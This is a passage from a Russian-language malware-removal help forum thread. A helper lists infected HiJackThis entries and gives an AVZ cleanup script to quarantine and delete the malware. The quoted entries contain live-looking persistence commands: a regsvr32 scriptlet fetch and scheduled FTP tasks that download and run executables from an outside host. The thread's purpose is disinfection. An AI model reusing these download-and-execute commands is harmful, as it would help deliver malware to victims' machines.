SQ 831 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 HiJackThis (из каталога autologger)профикситьВажно: необходимо отметить и профиксить только то, что указано ниже. O4-32 - HKLM\..\Run: [start] = C:\Windows\system32\regsvr32.exe /u /s /i:http://js.ftp0930.host:280/v.sct scrobj.dll O22 - Task: Mysa - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\Windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\Windows\system32\cmd.exe /c echo open ftp.ftp0930.host>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: ok - C:\Windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa AVZ выполнить следующий скрипт.Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора. begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; TerminateProcessByName('C:\Windows\debug\lsmose.exe'); TerminateProcessByName('c:\windows\temp\conhost.exe'); QuarantineFile('C:\Windows\Temp\conhost.exe',''); QuarantineFile('C:\Windows\debug\lsmose.exe',''); QuarantineFile('c:\windows\update.exe',''); QuarantineFile('c:\windows\debug\ok.dat',''); QuarantineFile('c:\windows\debug\item.dat',''); DeleteFile('c:\windows\debug\ok.dat','32'); DeleteFile('c:\windows\debug\item.dat','32'); DeleteFile('c:\windows\update.exe','32'); DeleteFile('C:\Windows\Temp\conhost.exe','32'); DeleteFile('C:\Windows\debug\lsmose.exe','32'); QuarantineFile('c:\windows\debug\ok.dat',''); QuarantineFile('c:\windows\debug\item.dat',''); QuarantineFile('a.exe',''); QuarantineFile('C:\Windows\debug\lsmose.exe',''); QuarantineFile('c:\windows\temp\conhost.exe',''); DeleteFile('c:\windows\temp\conhost.exe','32'); DeleteFile('C:\Windows\debug\lsmose.exe','32'); RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\Run','start','x32'); DeleteSchedulerTask('Mysa'); DeleteFile('c:\windows\debug\item.dat','64'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteFile('c:\windows\debug\ok.dat','64'); BC_ImportAll; ExecuteSysClean; BC_Activate; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end. После выполнения скрипта компьютер перезагрузится.После перезагрузки:- Выполните в AVZ: begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end. quarantine.zip из папки AVZ загрузите этот архив через данную формуПришлите новые логи автологгера, согласно правилам. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 31 октября, 2018 Автор Share Опубликовано 31 октября, 2018 Те не профиксил, потому что их там больше нет. Скрипт выполнил CollectionLog-2018.10.31-10.11.zip Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 В логах вроде все ок, давайте посмотрим, чтобы в загрузчике не было ничего плохого.1) Покажите лог TDSSKillerФайл C:\TDSSKiller.***_log.txt приложите в теме.(где *** - версия программы, дата и время запуска.)Если приложение что-то найдет, то сами самостоятельно не удаляйте.2) uVS можно работать с неактивной системой, для этого нужно загрузиться с WinPE диска/флэшки, в UVS "Выбрать каталог Windows" - указать на папку Windows на HDD и сделать полный образ автозапуска. https://yadi.sk/d/a1uco1wO3ag9q6- это загрузочная сборка UVS . Стартует с него uVS автоматически. Цитата Ссылка на сообщение Поделиться на другие сайты
David Goliath 0 Опубликовано 31 октября, 2018 Автор Share Опубликовано 31 октября, 2018 Вот. Система работает нормально, второй пункт не стал выполнять. Благодарю за помощь TDSSKiller.3.1.0.17_31.10.2018_21.16.42_log.txt Цитата Ссылка на сообщение Поделиться на другие сайты
SQ 831 Опубликовано 31 октября, 2018 Share Опубликовано 31 октября, 2018 Ok, в логах в любом случае ничего вредоносного не видно. Понаблюдайте пару дней, если все будет ок, то выполните завершающие шаги. В завершение: 1. Пожалуйста, запустите adwcleaner.exe В меню Настройки - Удалить AdwCleaner - выберите Удалить. Подтвердите удаление, нажав кнопку: Да. Переименуйте FRST.exe (или FRST64.exe) в uninstall.exe и запустите. Компьютер перезагрузится. Остальные утилиты лечения и папки можно просто удалить. 2. Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/8.1/10) Если увидите предупреждение от вашего фаервола или SmartScreen относительно программы SecurityCheck, не блокируйте ее работу Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt Прикрепите этот файл к своему следующему сообщению. Цитата Ссылка на сообщение Поделиться на другие сайты
yurik999 0 Опубликовано 4 января, 2019 Share Опубликовано 4 января, 2019 Строгое предупреждение от модератора Mark D. Pearlstone У вас нет прав оказывать помощь в данном разделе. Цитата Ссылка на сообщение Поделиться на другие сайты
Рекомендуемые сообщения
Присоединяйтесь к обсуждению
Вы можете написать сейчас и зарегистрироваться позже. Если у вас есть аккаунт, авторизуйтесь, чтобы опубликовать от имени своего аккаунта.